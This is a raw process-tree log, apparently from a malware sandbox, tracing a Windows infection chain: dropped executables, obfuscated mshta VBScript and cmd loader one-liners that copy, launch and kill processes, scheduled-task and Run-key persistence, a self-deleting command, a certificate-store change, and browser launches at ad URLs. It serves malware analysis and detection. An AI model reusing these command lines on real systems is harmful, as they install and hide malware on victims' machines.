C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj14⤵PID:8920
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "GUplXjkesdATxCcyjZ25HXZI.exe"13⤵
- Kills process with taskkill
PID:7276
-
-
-
-
-
C:\Users\Admin\Documents\E2HELBTaSyzUamWMspLwX6ce.exe"C:\Users\Admin\Documents\E2HELBTaSyzUamWMspLwX6ce.exe"10⤵
- Drops file in Program Files directory
PID:8352 -
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"11⤵PID:7588
-
C:\Users\Admin\Documents\3qPRGC7hHFpyuuaLCV_2pS_d.exe"C:\Users\Admin\Documents\3qPRGC7hHFpyuuaLCV_2pS_d.exe"12⤵PID:2004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 28813⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8380
-
-
-
C:\Users\Admin\Documents\EEsxsh6hzvnCQjfBdcH51WLj.exe"C:\Users\Admin\Documents\EEsxsh6hzvnCQjfBdcH51WLj.exe"12⤵PID:5508
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\Users\Admin\Documents\EEsxsh6hzvnCQjfBdcH51WLj.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\Users\Admin\Documents\EEsxsh6hzvnCQjfBdcH51WLj.exe"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )13⤵PID:8556
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\Documents\EEsxsh6hzvnCQjfBdcH51WLj.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\Users\Admin\Documents\EEsxsh6hzvnCQjfBdcH51WLj.exe" ) do taskkill /Im "%~NxB" /F14⤵PID:7872
-
C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXEGZ9~4QZ~O.EXe -P6_oIH__Ioj5q15⤵PID:1176
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if ""-P6_oIH__Ioj5q "" =="""" for %B iN ( ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )16⤵PID:8472
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "-P6_oIH__Ioj5q " =="" for %B iN ( "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE" ) do taskkill /Im "%~NxB" /F17⤵PID:1480
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" T~DJNB.F -u /S16⤵PID:7044
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "EEsxsh6hzvnCQjfBdcH51WLj.exe" /F15⤵
- Kills process with taskkill
PID:8668
-
-
-
-
-
C:\Users\Admin\Documents\_l6PEgshJczBJ77oH7daNFqa.exe"C:\Users\Admin\Documents\_l6PEgshJczBJ77oH7daNFqa.exe" /mixtwo12⤵PID:4940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 28413⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3184
-
-
-
C:\Users\Admin\Documents\AiDph03WgzdfF0tMv0nmMMNG.exe"C:\Users\Admin\Documents\AiDph03WgzdfF0tMv0nmMMNG.exe"12⤵PID:3636
-
C:\ProgramData\3206368.exe"C:\ProgramData\3206368.exe"13⤵PID:5436
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5436 -s 224014⤵
- Program crash
- Enumerates system info in registry
PID:4104
-
-
-
C:\ProgramData\2896057.exe"C:\ProgramData\2896057.exe"13⤵
- Suspicious behavior: SetClipboardViewer
PID:5128
-
-
C:\ProgramData\3556723.exe"C:\ProgramData\3556723.exe"13⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7780 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵PID:3200
-
-
-
C:\ProgramData\8894969.exe"C:\ProgramData\8894969.exe"13⤵PID:8592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8592 -s 218014⤵
- Program crash
- Checks processor information in registry
PID:5084
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST11⤵
- Creates scheduled task(s)
PID:4700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST11⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Creates scheduled task(s)
- Suspicious use of FindShellTrayWindow
PID:5696
-
-
-
C:\Users\Admin\Documents\OI5wr5AF4nqjsm6O4plsNMDM.exe"C:\Users\Admin\Documents\OI5wr5AF4nqjsm6O4plsNMDM.exe"10⤵
- Adds Run key to start application
PID:7996 -
C:\Windows\SysWOW64\dllhost.exedllhost.exe11⤵PID:5716
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Nobile.docm11⤵PID:5796
-
C:\Windows\SysWOW64\cmd.execmd12⤵PID:9032
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm13⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6928
-
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Rimasta.exe.comRimasta.exe.com J13⤵
- Suspicious use of SendNotifyMessage
PID:4816 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Rimasta.exe.com J14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4596 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RegAsm.exe15⤵PID:1560
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost13⤵
- Runs ping.exe
PID:4496
-
-
-
-
-
C:\Users\Admin\Documents\LNV9uPcVinX2zN55WKga4plA.exe"C:\Users\Admin\Documents\LNV9uPcVinX2zN55WKga4plA.exe"10⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:6968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 28811⤵
- Program crash
- Enumerates system info in registry
PID:7456
-
-
-
C:\Users\Admin\Documents\xvUFcI0dqC7QtXfhP8VZlIJx.exe"C:\Users\Admin\Documents\xvUFcI0dqC7QtXfhP8VZlIJx.exe"10⤵PID:5900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 24411⤵
- Program crash
- Enumerates system info in registry
PID:9052
-
-
-
C:\Users\Admin\Documents\NO8IF_rKvjRFeNXAat5ib35i.exe"C:\Users\Admin\Documents\NO8IF_rKvjRFeNXAat5ib35i.exe"10⤵PID:9144
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9144 -s 28011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7264
-
-
-
C:\Users\Admin\Documents\e7SjvO9r8SXC6IYCM0xto3KI.exe"C:\Users\Admin\Documents\e7SjvO9r8SXC6IYCM0xto3KI.exe"10⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2992
-
-
C:\Users\Admin\Documents\QOvXrR4rlmLibLrwtK2IpbhQ.exe"C:\Users\Admin\Documents\QOvXrR4rlmLibLrwtK2IpbhQ.exe"10⤵
- Suspicious use of SetThreadContext
PID:6660 -
C:\Users\Admin\Documents\QOvXrR4rlmLibLrwtK2IpbhQ.exe"C:\Users\Admin\Documents\QOvXrR4rlmLibLrwtK2IpbhQ.exe"11⤵PID:928
-
-
-
C:\Users\Admin\Documents\SH0x7N_frySVLN_OIZaCD0Qv.exe"C:\Users\Admin\Documents\SH0x7N_frySVLN_OIZaCD0Qv.exe"10⤵PID:7392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 23611⤵
- Program crash
- Enumerates system info in registry
PID:1628
-
-
-
C:\Users\Admin\Documents\Bq3IQEcP90EJpqVWzDqxp99R.exe"C:\Users\Admin\Documents\Bq3IQEcP90EJpqVWzDqxp99R.exe"10⤵PID:6352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 28011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4212
-
-
-
C:\Users\Admin\Documents\pNVeVdgmOmHhs4guZvikrayx.exe"C:\Users\Admin\Documents\pNVeVdgmOmHhs4guZvikrayx.exe"10⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9184
-
-
C:\Users\Admin\Documents\iQt299mxJajx2jZAvtnZ8h3z.exe"C:\Users\Admin\Documents\iQt299mxJajx2jZAvtnZ8h3z.exe"10⤵PID:5712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 26011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2088
-
-
-
C:\Users\Admin\Documents\BIgUSOkpnmDQtwEeZ2UqQgaZ.exe"C:\Users\Admin\Documents\BIgUSOkpnmDQtwEeZ2UqQgaZ.exe"10⤵PID:5212
-
-
C:\Users\Admin\Documents\bwWgtNFdD4gmaoUJi3mbqOX5.exe"C:\Users\Admin\Documents\bwWgtNFdD4gmaoUJi3mbqOX5.exe"10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\{EC4D448C-D8C6-40E7-A9F3-E69CD5FC6B17}\bwWgtNFdD4gmaoUJi3mbqOX5.exeC:\Users\Admin\AppData\Local\Temp\{EC4D448C-D8C6-40E7-A9F3-E69CD5FC6B17}\bwWgtNFdD4gmaoUJi3mbqOX5.exe /q"C:\Users\Admin\Documents\bwWgtNFdD4gmaoUJi3mbqOX5.exe" /tempdisk1folder"C:\Users\Admin\AppData\Local\Temp\{EC4D448C-D8C6-40E7-A9F3-E69CD5FC6B17}" /IS_temp11⤵
- Modifies registry class
PID:1164 -
C:\Windows\SysWOW64\MSIEXEC.EXE"C:\Windows\system32\MSIEXEC.EXE" /i "C:\Users\Admin\Documents\menageudrivers.msi" SETUPEXEDIR="C:\Users\Admin\Documents" SETUPEXENAME="bwWgtNFdD4gmaoUJi3mbqOX5.exe"12⤵
- Enumerates connected drives
PID:8916 -
C:\Users\Admin\AppData\Local\Temp\MSI2AB4.tmp"C:\Users\Admin\AppData\Local\Temp\MSI2AB4.tmp"13⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:7132
-
-
C:\Users\Admin\AppData\Local\Temp\MSI2A74.tmp"C:\Users\Admin\AppData\Local\Temp\MSI2A74.tmp"13⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:8252
-
-
C:\Users\Admin\AppData\Local\Temp\MSI2AA3.tmp"C:\Users\Admin\AppData\Local\Temp\MSI2AA3.tmp"13⤵PID:9116
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"9⤵PID:6600
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 10010⤵
- Runs ping.exe
PID:7408
-
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 90010⤵
- Runs ping.exe
PID:7576
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent8⤵PID:5776
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe4⤵PID:4552
-
C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu21b9847cb6727.exeThu21b9847cb6727.exe5⤵
- Executes dropped EXE
PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe4⤵
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu214ce31cede21.exeThu214ce31cede21.exe5⤵
- Executes dropped EXE
PID:3812 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3812 -s 2926⤵
- Program crash
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5532
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe4⤵PID:3868
-
C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu2156de5489c19.exeThu2156de5489c19.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2344 -
C:\Users\Admin\AppData\Local\Temp\tmpD82A_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpD82A_tmp.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5280 -
C:\Windows\SysWOW64\cmd.execmd /c cmd < Attesa.wmv7⤵PID:5624
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:6020
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv9⤵PID:5372
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comAdorarti.exe.com u9⤵PID:3104
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u10⤵PID:5928
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u11⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5672
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost9⤵
- Runs ping.exe
PID:5572
-
-
-
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe7⤵PID:5464
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214aaca5625.exe4⤵PID:476
-
C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu214aaca5625.exeThu214aaca5625.exe5⤵
- Executes dropped EXE
PID:3524 -
C:\Users\Admin\AppData\Local\Temp\is-BC8F2.tmp\Thu214aaca5625.tmp"C:\Users\Admin\AppData\Local\Temp\is-BC8F2.tmp\Thu214aaca5625.tmp" /SL5="$201F2,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4934C2E3\Thu214aaca5625.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\is-8L3MN.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-8L3MN.tmp\46807GHF____.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1456 -
C:\Program Files\Reference Assemblies\DFQAQOABAE\ultramediaburner.exe"C:\Program Files\Reference Assemblies\DFQAQOABAE\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:1696 -
C:\Users\Admin\AppData\Local\Temp\is-4BH4N.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-4BH4N.tmp\ultramediaburner.tmp" /SL5="$60374,281924,62464,C:\Program Files\Reference Assemblies\DFQAQOABAE\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2640 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c6-70c92-325-40894-168984539c98b\Cyherunoco.exe"C:\Users\Admin\AppData\Local\Temp\c6-70c92-325-40894-168984539c98b\Cyherunoco.exe"8⤵
- Executes dropped EXE
PID:4392 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:3764
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3b0a46f8,0x7ffd3b0a4708,0x7ffd3b0a471810⤵PID:476
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:6152
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x84,0x10c,0x7ffd3b0a46f8,0x7ffd3b0a4708,0x7ffd3b0a471810⤵PID:6056
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵PID:6772
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3b0a46f8,0x7ffd3b0a4708,0x7ffd3b0a471810⤵PID:4844
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵PID:4724
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ffd3b0a46f8,0x7ffd3b0a4708,0x7ffd3b0a471810⤵PID:4532
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
- Suspicious use of SetThreadContext
- Suspicious use of SendNotifyMessage
PID:4596 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xc0,0x10c,0x7ffd3b0a46f8,0x7ffd3b0a4708,0x7ffd3b0a471810⤵PID:5688
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\44-107e0-685-10999-6080fe9f62ad8\Kelaewetamu.exe"C:\Users\Admin\AppData\Local\Temp\44-107e0-685-10999-6080fe9f62ad8\Kelaewetamu.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5684 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gdw1igpi.fh5\GcleanerEU.exe /eufive & exit9⤵PID:4640
-
C:\Users\Admin\AppData\Local\Temp\gdw1igpi.fh5\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\gdw1igpi.fh5\GcleanerEU.exe /eufive10⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4720 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 28011⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5304
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1pn0gfmj.jze\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:4764
-
C:\Users\Admin\AppData\Local\Temp\1pn0gfmj.jze\installer.exeC:\Users\Admin\AppData\Local\Temp\1pn0gfmj.jze\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:1596 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1pn0gfmj.jze\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1pn0gfmj.jze\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630993042 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
PID:5904
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q3ggygar.kin\anyname.exe & exit9⤵PID:2480
-
C:\Users\Admin\AppData\Local\Temp\q3ggygar.kin\anyname.exeC:\Users\Admin\AppData\Local\Temp\q3ggygar.kin\anyname.exe10⤵PID:5224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2slmxhej.vz0\BsInstFile.exe & exit9⤵PID:2536
-
C:\Users\Admin\AppData\Local\Temp\2slmxhej.vz0\BsInstFile.exeC:\Users\Admin\AppData\Local\Temp\2slmxhej.vz0\BsInstFile.exe10⤵PID:3680
-
C:\ProgramData\2864142.exe"C:\ProgramData\2864142.exe"11⤵PID:3092
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3092 -s 70412⤵
- Program crash
PID:8172
-
-
-
C:\ProgramData\5251992.exe"C:\ProgramData\5251992.exe"11⤵
- Suspicious behavior: SetClipboardViewer
PID:1060
-
-
C:\ProgramData\1068919.exe"C:\ProgramData\1068919.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2948
-
-
C:\ProgramData\8018192.exe"C:\ProgramData\8018192.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2148
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0cjhjzox.hsc\Cleanpro13.exe & exit9⤵PID:1880
-
C:\Users\Admin\AppData\Local\Temp\0cjhjzox.hsc\Cleanpro13.exeC:\Users\Admin\AppData\Local\Temp\0cjhjzox.hsc\Cleanpro13.exe10⤵PID:5728
-
C:\Users\Admin\Documents\5ozFlDEpQlaE2Ewj5RVHD9ZJ.exe"C:\Users\Admin\Documents\5ozFlDEpQlaE2Ewj5RVHD9ZJ.exe"11⤵PID:6864
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\5ozFlDEpQlaE2Ewj5RVHD9ZJ.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\5ozFlDEpQlaE2Ewj5RVHD9ZJ.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )12⤵PID:7780
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\5ozFlDEpQlaE2Ewj5RVHD9ZJ.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\5ozFlDEpQlaE2Ewj5RVHD9ZJ.exe" ) do taskkill /f -im "%~nxA"13⤵PID:1636
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "5ozFlDEpQlaE2Ewj5RVHD9ZJ.exe"14⤵
- Kills process with taskkill
PID:5744
-
-
-
-
-
C:\Users\Admin\Documents\0UNMylx09ADaAeKLowPKU6rz.exe"C:\Users\Admin\Documents\0UNMylx09ADaAeKLowPKU6rz.exe"11⤵PID:6856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 24012⤵
- Program crash
- Enumerates system info in registry
PID:7144
-
-
-
